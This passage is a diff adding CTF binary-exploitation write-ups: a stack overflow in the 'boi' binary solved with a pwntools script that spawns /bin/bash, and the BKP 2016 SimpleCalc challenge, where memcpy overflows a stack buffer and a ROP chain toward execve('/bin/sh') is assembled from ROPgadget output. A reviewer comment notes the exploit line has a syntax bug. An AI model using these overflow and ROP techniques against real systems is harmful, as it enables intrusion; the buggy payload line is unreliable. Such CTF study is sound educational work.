+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: 0x3030303030303030 ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x3030303030303030
+ 0x00007fffffffe110│+0x0020: 0xcaf3baee30303030
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xeacf1d34e3c42300
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400698 mov rsi, rax
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ●→ 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a5 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a5 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤ search-pattern 00000000000000
+ [+] Searching '00000000000000' in memory
+ [+] In '/usr/lib/x86_64-linux-gnu/libc-2.31.so'(0x7ffff7f5e000-0x7ffff7fa8000), permission=r--
+ 0x7ffff7f7fd50 - 0x7ffff7f7fd60 → "0000000000000000"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffe100 - 0x7fffffffe10e → "00000000000000[...]"
+ gef➤ x/10g 0x7fffffffe100
+ 0x7fffffffe100: 0x3030303030303030 0x3030303030303030
+ 0x7fffffffe110: 0xcaf3baee30303030 0x0
+ 0x7fffffffe120: 0x7fffffffe220 0xeacf1d34e3c42300
+ 0x7fffffffe130: 0x4006e0 0x7ffff7e14d0a
+ 0x7fffffffe140: 0x7fffffffe228 0x100000000
+
+
+
+and this time we successfully overwrote the 0xdeadbeef value with our own 0xcaf3baee value! so when we continue onto the cmp instruction related to the if statement, we can see that we actually pass the check correctly, we need to se the next breakpoint at 0x4006a8 because this is where the CMP assembly instruction is:
+
+
+
+
+ 004006a8 3d ee ba CMP EAX,0xcaf3baee
+ f3 ca
+
+ 004006ad 75 0c JNZ LAB_004006bb
+ 004006af bf 7c 07 MOV EDI=>s_/bin/bash_0040077c,s_/bin/bash_0040077c = "/bin/bash"
+ 40 00
+ 004006b4 e8 6d ff CALL run_cmd undefined run_cmd()
+ ff ff
+
+
+
+
+ gef➤ b *0x4006a8
+ Breakpoint 2 at 0x4006a8
+ gef➤ c
+ Continuing.
+
+ Breakpoint 2, 0x00000000004006a8 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0xcaf3baee
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → 0x3030303030303030 ("00000000"?)
+ $rdi : 0x0
+ $rip : 0x00000000004006a8 → cmp eax, 0xcaf3baee
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: 0x3030303030303030 ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x3030303030303030
+ 0x00007fffffffe110│+0x0020: 0xcaf3baee30303030
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xeacf1d34e3c42300
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ● 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ ●→ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ 0x4006bb mov edi, 0x400786
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a8 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a8 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+Now from here we see the cmp value is comparing the eax register to the value 0xcaf3baee, so let's check what is inside eax:
+
+
+ gef➤ p $eax
+ $1 = 0xcaf3baee
+
+
+
+So this means we should successfully pass the cmp instruction because both values are equal to 0xcaf3baee, so let's use python's pwntools to write an exploit to solve the challenge:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → ls
+ boi input
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → vim exploit.py
+
+
+
+
+ #First, import the pwntools library
+ from pwn import *
+
+ #then set the target as the ./boi process
+ target = process ('./boi')
+
+ #then create the 14 0 bytes and little endian caf3baee payload
+ payload = "0"*0x14 + + "\xee\xba\xf3\xca"
+
+ # send the payload to the process
+ target.send(payload)
+
+ #and then drop into a shell to view the result
+ target.interactive()
+
+
+
+now let's test it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → python3 exploit.py
+ [+] Starting local process './boi': pid 9071
+ [*] Switching to interactive mode
+ Are you a big boiiiii??
+ $ id
+ uid=1000(nothing) gid=1000(nothing) groups=1000(nothing),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),113(kaboxer)
+ $ echo $0
+ /bin/bash
+
+
+and we succeeded ! It managed to spawn the bash shell like we wanted.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
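Review bot: the `exploit.py` listed in this hunk does not run as written: `payload = "0"*0x14 + + "\xee\xba\xf3\xca"` has a doubled `+`, so Python applies unary plus to a str and raises a TypeError before anything is sent, and since the script is launched with `python3`, the str literal `"\xee\xba\xf3\xca"` is Unicode text that pwntools will encode as UTF-8 (eight bytes, not the four the comparison needs). Suggest `payload = b"0"*0x14 + p32(0xcaf3baee)`, which also matches the `p32(...)` the prose already mentions. The surrounding text should also be corrected so the numbers agree with the gdb output it shows: `"0"*0x10` is 16 filler bytes, not 10, and `0x14` is 20, not 14; "least endian" should read "little endian"; and the "for some reason" adjustment from 0x10 to 0x14 has a visible explanation in the listing, since `mov eax, DWORD PTR [rbp-0x1c]` with `$rbp : 0x00007fffffffe130` reads from 0x7fffffffe114, which is exactly 0x14 bytes past the input buffer at 0x7fffffffe100 (the first attempt's `0xdeadbe0acaf3baee` at 0x7fffffffe110 shows the four bytes landing one dword too early, with the trailing newline 0x0a overwriting the `ef` of 0xdeadbeef). Stating that in the prose makes the offset a derivation rather than trial and error.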
diff --git a/2/calc.md b/2/calc.md
new file mode 100644
index 0000000..ba506ea
--- /dev/null
+++ b/2/calc.md
@@ -0,0 +1,851 @@
+# BKP 2016 SimpleCalc
+
+Holy shit there is a HUGE jump in difficulty at this point, buckle up !
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/bkp16_simplecalc/simplecalc
+ --2021-03-05 18:28:45-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/bkp16_simplecalc/simplecalc
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/bkp16_simplecalc/simplecalc [following]
+ --2021-03-05 18:28:46-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/bkp16_simplecalc/simplecalc
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 882266 (862K) [application/octet-stream]
+ Saving to: ‘simplecalc’
+
+ simplecalc 100%[============================================================================================================================================================================>] 861.59K 2.36MB/s in 0.4s
+
+ 2021-03-05 18:28:47 (2.36 MB/s) - ‘simplecalc’ saved [882266/882266]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → file simplecalc
+ simplecalc: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=3ca876069b2b8dc3f412c6205592a1d7523ba9ea, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → chmod +x simplecalc
+
+
+
+` ![]()
+
+## Solution
+
+First let's check what the binary does by executing it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ./simplecalc
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 3
+ Invalid number.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ./simplecalc
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 1
+ Invalid number.
+
+
+
+
+The binary file prints out some text, and then asks for some input, and then just says 'invalid' so let's check it from inside ghidra:
+
+
+
+So we get the following code:
+
+
+ undefined8 main(void)
+
+ {
+ undefined auStack72 [40];
+ int iStack32;
+ int iStack28;
+ void *pvStack24;
+ int iStack12;
+
+ iStack28 = 0;
+ setvbuf((FILE *)stdin,(char *)0x0,2,0);
+ setvbuf((FILE *)stdout,(char *)0x0,2,0);
+ print_motd();
+ printf("Expected number of calculations: ");
+ __isoc99_scanf(&DAT;_00494214,&iStack28;);
+ handle_newline();
+ if ((iStack28 < 0x100) && (3 < iStack28)) {
+ pvStack24 = malloc((long)(iStack28 << 2));
+ iStack12 = 0;
+ while (iStack12 < iStack28) {
+ print_menu();
+ __isoc99_scanf(&DAT;_00494214,&iStack32;);
+ handle_newline();
+ if (iStack32 == 1) {
+ adds();
+ *(undefined4 *)((long)iStack12 * 4 + (long)pvStack24) = add._8_4_;
+ }
+ else {
+ if (iStack32 == 2) {
+ subs();
+ *(undefined4 *)((long)iStack12 * 4 + (long)pvStack24) = sub._8_4_;
+ }
+ else {
+ if (iStack32 == 3) {
+ muls();
+ *(undefined4 *)((long)iStack12 * 4 + (long)pvStack24) = mul._8_4_;
+ }
+ else {
+ if (iStack32 == 4) {
+ divs();
+ *(undefined4 *)((long)iStack12 * 4 + (long)pvStack24) = divv._8_4_;
+ }
+ else {
+ if (iStack32 == 5) {
+ memcpy(auStack72,pvStack24,(long)(iStack28 << 2));
+ free(pvStack24);
+ return 0;
+ }
+ puts("Invalid option.\n");
+ }
+ }
+ }
+ }
+ iStack12 = iStack12 + 1;
+ }
+ free(pvStack24);
+ }
+ else {
+ puts("Invalid number.");
+ }
+ return 0;
+ }
+
+
+Here we see that the main function checks if our input number is between 3 and 0x100, if no tit just prints 'Invalid Number' now let's run the binary again to verify that:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ./simplecalc
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 5
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 1
+ Integer x: 1
+ Integer y: 2
+ Do you really need help calculating such small numbers?
+ Shame on you... Bye
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ./simplecalc
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 5
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 1
+ Integer x: 123456
+ Integer y: 654321
+ Result for x + y is 777777.
+
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 5
+
+
+
+Now we see some more info about the binary, looking back at the reversed code in ghidra we see some more info:
+
+
+ __isoc99_scanf(&DAT;_00494214,&numberCalcs;);
+ handle_newline();
+ if ((numberCalcs < 0x100) && (3 < numberCalcs)) {
+ calculations = malloc((long)(numberCalcs << 2));
+
+
+after scanning for our input, we give a correct number of calculations, we see that it malloc a size equal to **numberCalcs****< 2 ** and then store the pointer to it in the **calculations** variable this is the same operation as doing numverCalcs * 4. Basically, allocating numberCalcs number of integers which each of them are 4 bytes large. Then it will enter into a while loop that runs once for each calculation we will specify. Looking at the assembly code for the multiplication section, we see the muls function:
+
+
+
+
+ 004014d3 83 f8 03 CMP EAX,0x3
+ 004014d6 75 23 JNZ LAB_004014fb
+ 004014d8 e8 cb fd CALL muls
+
+
+
+Now let's take a look at the muls function:
+
+
+ void muls(void)
+
+ {
+ printf("Integer x: ");
+ __isoc99_scanf(&DAT;_00494214,mul);
+ handle_newline();
+ printf("Integer y: ");
+ __isoc99_scanf(&DAT;_00494214,0x6c4aa4);
+ handle_newline();
+ if ((0x27 < mul._0_4_) && (0x27 < mul._4_4_)) {
+ mul._8_4_ = mul._4_4_ * mul._0_4_;
+ printf("Result for x * y is %d.\n\n",(ulong)mul._8_4_);
+ return;
+ }
+ puts("Do you really need help calculating such small numbers?\nShame on you... Bye");
+ /* WARNING: Subroutine does not return */
+ exit(-1);
+ }
+
+
+Here it basically checks that the 2 numbers are equal or greater to 0x27, The other operations (add, sub, div are p much the same) The bug that we need to notice is at the 5th option:
+
+
+ if (local_20 == 5) {
+ memcpy(local_48,local_18,(long)(local_1c << 2));
+ free(local_18);
+ return 0;
+ }
+
+
+In here there is the memcpy function being used to copy our calculations into**local_48** which is a vulnerable buffer because it does not do a size check, therefore if we have enough calculations, we can overflow the buffer and overwrite the return address because there is no stack canary to prevent this as you can see below:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → pwn checksec simplecalc
+ [*] '/home/nothing/binexp/2/calc/simplecalc'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+
+
+Now from here we want to find the offset between the start of our input and the return address using gdb:
+
+
+
+We want the first breakpoint to be right after the memcpy function so we choose the address of **0x0040154a**
+
+
+ gef➤ b *0x40154a
+ Breakpoint 1 at 0x40154a
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/calc/simplecalc
+
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 50
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 1
+ Integer x: 13371337
+ Integer y: 13371337
+ Result for x + y is 26742674.
+
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 5
+
+ Breakpoint 1, 0x000000000040154a in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x00007fffffffdef0 → 0x0000000001980f92
+ $rbx : 0x00000000004002b0 → <_init+0> sub rsp, 0x8
+ $rcx : 0x0
+ $rdx : 0x0
+ $rsp : 0x00007fffffffdee0 → 0x00007fffffffe018 → 0x00007fffffffe34d → "/home/nothing/binexp/2/calc/simplecalc"
+ $rbp : 0x00007fffffffdf30 → 0x0000000000000000
+ $rsi : 0x00000000006c8c98 → 0x0000000000020371
+ $rdi : 0x00007fffffffdfb8 → 0x0000000000000000
+ $rip : 0x000000000040154a → mov rax, QWORD PTR [rbp-0x10]
+ $r8 : 0x0
+ $r9 : 0x0
+ $r10 : 0x0
+ $r11 : 0x0
+ $r12 : 0x0
+ $r13 : 0x0000000000401c00 → <__libc_csu_init+0> push r14
+ $r14 : 0x0000000000401c90 → <__libc_csu_fini+0> push rbx
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffdee0│+0x0000: 0x00007fffffffe018 → 0x00007fffffffe34d → "/home/nothing/binexp/2/calc/simplecalc" ← $rsp
+ 0x00007fffffffdee8│+0x0008: 0x0000000100400d41 ("A\r@"?)
+ 0x00007fffffffdef0│+0x0010: 0x0000000001980f92 ← $rax
+ 0x00007fffffffdef8│+0x0018: 0x0000000000000000
+ 0x00007fffffffdf00│+0x0020: 0x0000000000000000
+ 0x00007fffffffdf08│+0x0028: 0x0000000000000000
+ 0x00007fffffffdf10│+0x0030: 0x0000000000000000
+ 0x00007fffffffdf18│+0x0038: 0x0000000000000000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x40153d rex.RB ror BYTE PTR [r8-0x77], 0xce
+ 0x401542 mov rdi, rax
+ 0x401545 call 0x4228d0
+ ●→ 0x40154a mov rax, QWORD PTR [rbp-0x10]
+ 0x40154e mov rdi, rax
+ 0x401551 call 0x4156d0
+ 0x401556 mov eax, 0x0
+ 0x40155b jmp 0x401588
+ 0x40155d mov edi, 0x494402
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "simplecalc", stopped 0x40154a in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x40154a → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+Here we first set the breakpoint at **0x40154a** , then we ran the binary, we selected 50 calculations, then made an addition with the 2 numbers 13371337 and 13371337 which gave us a result of **26742674** , and then we selected 5 to exit and reach the **memcpy** call and thus, our breakpoint, Now what we want to know is where is the result (26742674) stored ? To know this, we need to first know the hex value of our result:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/calc]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(26742674)
+ '0x1980f92'
+
+
+
+Now we know that we have to find **0x1980f92** in memory, so we search for the 0x1980f92 pattern in gdb :
+
+
+ gef➤ search-pattern '0x1980f92'
+ [+] Searching '0x1980f92' in memory
+ gef➤ search-pattern 0x1980f92
+ [+] Searching '0x1980f92' in memory
+ gef➤
+
+
+Now as you can see **0x198 0f92** is 7 bytes long. if we try to search that pattern, we won't find it:
+
+
+
+ gef➤ search-pattern 0x1980f92
+ [+] Searching '0x1980f92' in memory
+
+
+
+So here we need to add an extra zero to end up with 8 bytes: **0x0198 0f92** and then we can find the pattern in memory:
+
+
+ gef➤ search-pattern 0x01980f92
+ [+] Searching '\x92\x0f\x98\x01' in memory
+ [+] In '[heap]'(0x6c3000-0x6e9000), permission=rw-
+ 0x6c4a88 - 0x6c4a98 → "\x92\x0f\x98\x01[...]"
+ 0x6c8bd0 - 0x6c8be0 → "\x92\x0f\x98\x01[...]"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffb158 - 0x7fffffffb168 → "\x92\x0f\x98\x01[...]"
+ 0x7fffffffdef0 - 0x7fffffffdf00 → "\x92\x0f\x98\x01[...]"
+
+ gef➤ info frame
+ Stack level 0, frame at 0x7fffffffdf40:
+ rip = 0x40154a in main; saved rip = 0x0
+ Arglist at 0x7fffffffdf30, args:
+ Locals at 0x7fffffffdf30, Previous frame's sp is 0x7fffffffdf40
+ Saved registers:
+ rbp at 0x7fffffffdf30, rip at 0x7fffffffdf38
+
+
+
+Now here we see that the pattern is at **0x7fffffffdef0** and the return address is at **0x7fffffffdf38**. So we can calculate the offset:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [blog/binexp/2]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffdef0 - 0x7fffffffdf38 )
+ '-0x48'
+
+
+
+Now we know that there is a 0x48 bytes offset between the pattern an the return call. There are 4 bytes for each integer, so we can divide it by 4:
+
+
+ >>> int(0x48)
+ 72
+ >>> int(72 / 4)
+ 18
+
+
+
+Now we know that we will need 18 integers, Now since the binary is statically linked and there is no PIE (as we saw earlier in the pwn checksec command output), We can build a rop chain using the binary for gadgets and without an infoleak. The ROP chain will make an execve syscall to **/bin/sh** just like in the previous tutorials except that now we need to take into account 4 registers that we need to control in order to make this syscall:
+
+As we saw in our [previous](../asm/2.html) x86_64 assembly tutorials, we need rax to take in our syscall ID, rdi to take the first arguement, rsi to take the 2nd arguement and rdx to take the third arguement. We can use this list to know more about syscalls, and since we are in x86_64 we will use the syscall ID 59 (0x3b) to trigger execve:
+
+
+ rax : 0x3b # syscall ID
+ rdi : ptr to "/bin//sh" # arg 1 to spawn /bin/sh
+ rsi : 0x0 # arg 2
+ rdx : 0x0 # arg 3
+
+
+To do this, we need what's known as 'gadgets' to control those 4 registers. to find these gadgets we will use the following template**pop rax; ret**. we will use [ROPGadget.py](https://github.com/JonathanSalwan/ROPgadget):
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [~]
+ → sudo pip3 install capstone
+ [sudo] password for nothing:
+ Requirement already satisfied: capstone in /usr/lib/python3.9/site-packages (4.0.2)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [~]
+ → cd /opt
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt]
+ → git clone https://github.com/JonathanSalwan/ROPgadget
+ fatal: could not create work tree dir 'ROPgadget': Permission denied
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt]
+ → sudo !!
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt]
+ → sudo git clone https://github.com/JonathanSalwan/ROPgadget
+ Cloning into 'ROPgadget'...
+ remote: Enumerating objects: 20, done.
+ remote: Counting objects: 100% (20/20), done.
+ remote: Compressing objects: 100% (14/14), done.
+ remote: Total 3715 (delta 7), reused 12 (delta 6), pack-reused 3695
+ Receiving objects: 100% (3715/3715), 22.62 MiB | 6.86 MiB/s, done.
+ Resolving deltas: 100% (2286/2286), done.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt]
+ → cd ROPgadget
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt/ROPgadget]
+ → ls
+ AUTHORS LICENSE_BSD.txt README.md ropgadget ROPgadget.py scripts setup.cfg setup.py test-suite-binaries
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt/ROPgadget]
+ → echo $PATH
+ /usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/lib/jvm/default/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl:/var/lib/snapd/snap/bin
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt/ROPgadget]
+ → sudo ln -s ROPgadget.py /usr/local/bin/ROPgadget.py
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt/ROPgadget]
+ → ROPgadget
+ [Error] Need a binary filename (--binary/--console or --help)
+
+
+
+Once that's done we can continue and find the gadgets of rax, rdi, rsi and rdx:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "pop rax ; ret"
+ 0x000000000044db32 : add al, ch ; pop rax ; ret
+ 0x000000000040b032 : add al, ch ; pop rax ; retf 2
+ 0x000000000040b02f : add byte ptr [rax], 0 ; add al, ch ; pop rax ; retf 2
+ 0x000000000040b030 : add byte ptr [rax], al ; add al, ch ; pop rax ; retf 2
+ 0x00000000004b0801 : in al, 0x4c ; pop rax ; retf
+ 0x000000000040b02e : in al, dx ; add byte ptr [rax], 0 ; add al, ch ; pop rax ; retf 2
+ 0x0000000000474855 : or dh, byte ptr [rcx] ; ror byte ptr [rax - 0x7d], 0xc4 ; pop rax ; ret
+ 0x000000000044db34 : pop rax ; ret
+ 0x000000000045d707 : pop rax ; retf
+ 0x000000000040b034 : pop rax ; retf 2
+ 0x0000000000474857 : ror byte ptr [rax - 0x7d], 0xc4 ; pop rax ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "pop rdi ; ret"
+ 0x000000000044bbbc : inc dword ptr [rbx - 0x7bf0fe40] ; pop rdi ; ret
+ 0x0000000000401b73 : pop rdi ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "pop rsi ; ret"
+ 0x00000000004ac9b4 : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rsi ; ret
+ 0x00000000004ac9b6 : add byte ptr [rax], al ; pop rsi ; ret
+ 0x0000000000437aa9 : pop rdx ; pop rsi ; ret
+ 0x0000000000401c87 : pop rsi ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "pop rdx ; ret"
+ 0x00000000004a868c : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rdx ; ret 0x45
+ 0x00000000004a868e : add byte ptr [rax], al ; pop rdx ; ret 0x45
+ 0x00000000004afd61 : js 0x4afdde ; pop rdx ; retf
+ 0x0000000000414ed0 : or al, ch ; pop rdx ; ret 0xffff
+ 0x0000000000437a85 : pop rdx ; ret
+ 0x00000000004a8690 : pop rdx ; ret 0x45
+ 0x00000000004b2dd8 : pop rdx ; ret 0xfffd
+ 0x0000000000414ed2 : pop rdx ; ret 0xffff
+ 0x00000000004afd63 : pop rdx ; retf
+ 0x000000000044af60 : pop rdx ; retf 0xffff
+ 0x00000000004560ae : test byte ptr [rdi - 0x1600002f], al ; pop rdx ; ret
+
+
+
+Now we know that the gadgets we need to control the 4 registers are :
+
+
+ rax: 0x44db34
+ rdi: 0x401b73
+ rsi: 0x401c87
+ rdx: 0x437a85
+
+
+
+Now this is where the writeup of this binary challenge hits a very random point. you basically have to find a gadget that will write an eight byte value to a memory region, and it's a mov involving that will move 4 bytes from **rdx** to whatever memory is **pointed** by **rax** :
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "mov" | grep "rdx" | grep "\[rax\]" | grep "ptr"
+
+
+
+
+ 0x000000000046a7a9 : mov qword ptr [rax], rdx ; jmp 0x46a257
+ 0x0000000000461a5f : mov qword ptr [rax], rdx ; mov eax, dword ptr [rsi] ; pop rbx ; ret
+ 0x000000000040274f : mov qword ptr [rax], rdx ; mov edx, 0xfe8 ; jmp 0x4026b4
